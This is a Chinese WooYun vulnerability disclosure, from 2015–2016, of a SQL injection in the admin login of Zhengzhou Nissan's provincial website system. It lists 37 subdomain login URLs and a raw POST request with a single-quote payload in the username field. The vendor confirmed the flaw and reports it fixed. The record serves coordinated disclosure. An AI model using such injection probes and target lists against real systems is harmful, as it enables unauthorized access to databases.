当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165130

漏洞标题:郑州日产汽车有限公司省级网站管理系统SQL注入漏洞37个分站使用该系统

相关厂商:郑州日产汽车有限公司

漏洞作者: 岛云首席鉴黄师

提交时间:2015-12-28 12:44

修复时间:2016-01-14 11:29

公开时间:2016-01-14 11:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

……

详细说明:

后台登录框POST注入,共37个分钟使用该系统。

http://beijing.zznissan.com.cn/admin/console/?c=login&a=log
http://anhui.zznissan.com.cn/admin/console/?c=login&a=log
http://chongqing.zznissan.com.cn/admin/console/?c=login&a=log
http://civilian.zznissan.com.cn/admin/console/?c=login&a=log
http://e.zznissan.com.cn/admin/console/?c=login&a=log
http://fujian.zznissan.com.cn/admin/console/?c=login&a=log
http://gansu.zznissan.com.cn/admin/console/?c=login&a=log
http://guangdong.zznissan.com.cn/admin/console/?c=login&a=log
http://guangxi.zznissan.com.cn/admin/console/?c=login&a=log
http://guangzhou.zznissan.com.cn/admin/console/?c=login&a=log
http://guizhou.zznissan.com.cn/admin/console/?c=login&a=log
http://hainan.zznissan.com.cn/admin/console/?c=login&a=log
http://hebei.zznissan.com.cn/admin/console/?c=login&a=log
http://heilongjiang.zznissan.com.cn/admin/console/?c=login&a=log
http://henan.zznissan.com.cn/admin/console/?c=login&a=log
http://hubei.zznissan.com.cn/admin/console/?c=login&a=log
http://hunan.zznissan.com.cn/admin/console/?c=login&a=log
http://jiangsu.zznissan.com.cn/admin/console/?c=login&a=log
http://jiangxi.zznissan.com.cn/admin/console/?c=login&a=log
http://jilin.zznissan.com.cn/admin/console/?c=login&a=log
http://liaoning.zznissan.com.cn/admin/console/?c=login&a=log
http://neimenggu.zznissan.com.cn/admin/console/?c=login&a=log
http://ningxia.zznissan.com.cn/admin/console/?c=login&a=log
http://nv200.zznissan.com.cn/admin/console/?c=login&a=log
http://patrol.zznissan.com.cn/admin/console/?c=login&a=log
http://qinghai.zznissan.com.cn/admin/console/?c=login&a=log
http://shandong.zznissan.com.cn/admin/console/?c=login&a=log
http://shanghai.zznissan.com.cn/admin/console/?c=login&a=log
http://shanxi.zznissan.com.cn/admin/console/?c=login&a=log
http://sichuan.zznissan.com.cn/admin/console/?c=login&a=log
http://spv.zznissan.com.cn/admin/console/?c=login&a=log
http://sx.zznissan.com.cn/admin/console/?c=login&a=log
http://tianjin.zznissan.com.cn/admin/console/?c=login&a=log
http://zhejiang.zznissan.com.cn/admin/console/?c=login&a=log
http://yunnan.zznissan.com.cn/admin/console/?c=login&a=log
http://xizang.zznissan.com.cn/admin/console/?c=login&a=log
http://xinjiang.zznissan.com.cn/admin/console/?c=login&a=log


POST数据:

POST /admin/console/?c=login HTTP/1.1
Host: fujian.zznissan.com.cn
Content-Length: 75
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://fujian.zznissan.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://fujian.zznissan.com.cn/admin/console/?c=login&a=log
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: XYRE_SID=a6c39677a50f5f66aff40c1f9b418252f1dcab57; PHPSESSID=6fdrf9jc327vdev1r63uid85i7
username=%27&password=&captcha=cjfa&imageField.x=64&imageField.y=19&a=login


注入参数:username

1.png


2.png


3.png

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 岛云首席鉴黄师@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-31 14:03

厂商回复:

已确认,谢谢!

最新状态:

2016-01-14:在洞主的帮助下,修改源代码,已修复此漏洞。对洞主再次致谢!


漏洞评价:

评价

  1. 2015-12-31 14:17 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @郑州日产汽车有限公司 侧重的问一下,发现漏洞买车给优惠么?

  2. 2016-01-14 10:21 | 郑州日产汽车有限公司(乌云厂商)

    @岛云首席鉴黄师 现在市场上的优惠大礼包,几乎等于员工内部购车优惠啦。年底嘛,车厂都在冲量。

  3. 2016-01-14 10:22 | 郑州日产汽车有限公司(乌云厂商)

    @岛云首席鉴黄师 兄如果有时间,可否再测试一下?开发修改过代码后,我这里不能复现这个post注入了。

  4. 2016-01-14 11:19 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @郑州日产汽车有限公司 没有了~哈哈

  5. 2016-01-14 11:29 | 郑州日产汽车有限公司(乌云厂商)

    @岛云首席鉴黄师 非常感谢!

  6. 2016-01-14 12:32 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:460 漏洞数:125 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @郑州日产汽车有限公司 客气了~